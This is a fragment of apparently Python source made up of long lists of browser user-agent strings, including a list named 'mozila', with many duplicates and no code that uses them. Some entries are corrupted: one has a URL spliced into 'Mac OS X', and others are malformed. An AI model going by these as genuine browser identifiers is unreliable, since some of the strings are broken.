'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
'Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN']
mozila = [
'Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1', 'Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0',
'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0',
'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1',
'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3',
'Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0',
'Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)',
'Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5', 'Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.8',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20', 'Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2', 'Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2',
'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1', 'Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1', 'Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1',
'Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ',
'Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre',
'Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2', 'Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0', 'Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5',
'Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1',
'Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre',
'Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0',
'Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1',
'Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15',
'Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko',
'Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16',
'Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025',
'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1',
'Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.8',
'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330',
'Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)',
'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8',
'Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0',
'Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9',
'Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12',
'Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0',
'Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15',
'Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3',
'Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8',
'Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3',
'Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0', 'Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN', 'Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN',
'Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN',
'Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN',
